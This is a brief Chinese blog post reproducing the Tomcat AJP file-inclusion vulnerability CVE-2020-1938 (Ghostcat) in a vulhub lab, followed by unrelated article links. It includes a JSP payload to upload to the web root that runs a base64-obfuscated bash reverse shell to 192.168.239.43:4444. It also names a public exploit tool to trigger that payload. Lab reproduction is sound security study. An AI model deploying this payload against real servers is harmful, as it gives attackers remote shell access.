vulhub中Aapache Tomcat AJP 文件包含漏洞复现(CVE-2020-1938)

余生有个小酒馆2024-03-02 13:21

查看tomcat默认页面,此时通过AJP协议的8009端口亦可访问Tomcat。

利用如下工具均可测试漏洞:

工具需要用到python2,

如果需要进一步利用需要向服务器的/webapps/ROOT目录下上传恶意文件

复制代码 
<%Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzOS40My80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}");%>

利用工具https://github.com/00theway/Ghostcat-CNVD-2020-10487

进行执行上传的恶意文件

相关推荐
秋书一叶34 分钟前
SpringBoot项目打包为window安装包
java·spring boot·后端
碎梦归途38 分钟前
23种设计模式-结构型模式之外观模式(Java版本)
java·开发语言·jvm·设计模式·intellij-idea·外观模式
极客先躯1 小时前
高级java每日一道面试题-2025年4月13日-微服务篇[Nacos篇]-Nacos如何处理网络分区情况下的服务可用性问题?
java·服务器·网络·微服务·nacos·高级面试
pwzs1 小时前
Spring MVC 执行流程全解析:从请求到响应的七步走
java·后端·spring·spring mvc
我该如何取个名字2 小时前
Mac配置Java的环境变量
java·开发语言·macos
kkkkatoq2 小时前
Java中的锁
java·开发语言
界面开发小八哥2 小时前
「Java EE开发指南」用MyEclipse开发EJB 3无状态会话Bean(二)
java·ide·java-ee·eclipse·myeclipse
LCY1332 小时前
spring security +kotlin 实现oauth2.0 认证
java·spring·kotlin
soulermax2 小时前
数字ic后端设计从入门到精通2(含fusion compiler, tcl教学)
java·linux·服务器
我的代码永没有bug2 小时前
day1-小白学习JAVA---JDK安装和环境变量配置(mac版)
java·学习·macos
热门推荐
01KGG转MP3工具|非KGM文件|解密音频02我决定放弃搞 Java 了03RAG 实践- Ollama+RagFlow 部署本地知识库04从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑05YOLOv8改进 | 细节创新篇 | iAFF迭代注意力特征融合助力多目标细节涨点06DeepSeek各版本说明与优缺点分析07yolov8,yolo11,yolo12 服务器训练到部署全流程 笔记08Scipy||第三章 线性代数 (scipy.linalg)09本地化部署AI知识库:基于Ollama+DeepSeek+AnythingLLM保姆级教程10最新 Kubernetes 集群部署 + flannel 网络插件(保姆级教程,最新 K8S 版本)